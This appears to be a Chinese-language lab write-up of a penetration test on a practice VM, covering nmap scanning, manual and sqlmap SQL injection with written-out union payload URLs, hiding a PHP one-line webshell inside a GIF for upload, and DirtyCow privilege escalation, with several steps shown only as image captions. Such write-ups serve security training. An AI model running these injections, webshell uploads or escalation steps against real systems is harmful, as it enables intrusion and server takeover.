dirtycow(脏牛提权)靶机渗透测试

nmap扫描存活主机

nmap -sn 192.168.233.0/24

dirtycow(脏牛提权)靶机渗透测试_第1张图片发现靶机192.168.233.133

扫描端口

nmap -sV -sC -sT -p- 192.168.233.133

dirtycow(脏牛提权)靶机渗透测试_第2张图片
御剑扫描
dirtycow(脏牛提权)靶机渗透测试_第3张图片

注入测试

手工注入—>确定注入点
dirtycow(脏牛提权)靶机渗透测试_第4张图片dirtycow(脏牛提权)靶机渗透测试_第5张图片

判断列数
dirtycow(脏牛提权)靶机渗透测试_第6张图片dirtycow(脏牛提权)靶机渗透测试_第7张图片使用union all 手工注 查找对应位置
http://192.168.233.133/storypage_04.php?id=-115%20union%20all%20select%201,2,3,4,5,6,7,8,9,10,11,12,13–+
dirtycow(脏牛提权)靶机渗透测试_第8张图片
http://192.168.233.133/storypage_04.php?id=-115%20union%20all%20select%20version(),user(),database(),4,5,6,7,8,9,@@datadir,11,12,13–+

dirtycow(脏牛提权)靶机渗透测试_第9张图片

Sqlmap工具测试

爆库
dirtycow(脏牛提权)靶机渗透测试_第10张图片dirtycow(脏牛提权)靶机渗透测试_第11张图片

爆表
dirtycow(脏牛提权)靶机渗透测试_第12张图片dirtycow(脏牛提权)靶机渗透测试_第13张图片

1.任意文件上传漏洞
后台管理系统的“首页管理系统”功能中的“新增大图”存在任意文件上传漏洞,可以直接上传PHP文件,但是该上传功能会检测图片格式,所以需要将一句话木马1.php附加在正常的gif图片gif.gif的后面。打开命令提示符cmd,使用cd切换到一句话木马和gif图片所在的目录,使用如下命令即可生成一个可上传的一句话木马one.php:
copy gif.gif/b+1.php/a one.php
在后台管理系统的“首页管理系统”中,点击“新增大图”按钮,选择one.php上传,可以上传成功,在列表中找到刚刚上传的那条,点击“编辑”,可以看到刚刚上传的“图片”,在图片上点击右键,可查看该“图片”的链接地址,可以看到是以php为后缀名的,说明一句话木马上传成功,一句话木马的URL形式类似于:
http://10.10.20.101/back/upload/banner_62.php
将一句话木马的链接添加到caidao即可得到webshell
dirtycow(脏牛提权)靶机渗透测试_第14张图片上菜刀
连接成功
dirtycow(脏牛提权)靶机渗透测试_第15张图片进行提权操作
上传linux.sh文件 到/tmp目录下
dirtycow(脏牛提权)靶机渗透测试_第16张图片
赋权限 进行执行
dirtycow(脏牛提权)靶机渗透测试_第17张图片直接选用dirtycow 进行提权操作
dirtycow(脏牛提权)靶机渗透测试_第18张图片选用脏牛进行提权 下面是利用代码和过程
dirtycow(脏牛提权)靶机渗透测试_第19张图片成功
在这里插入图片描述

你可能感兴趣的:(个人理解)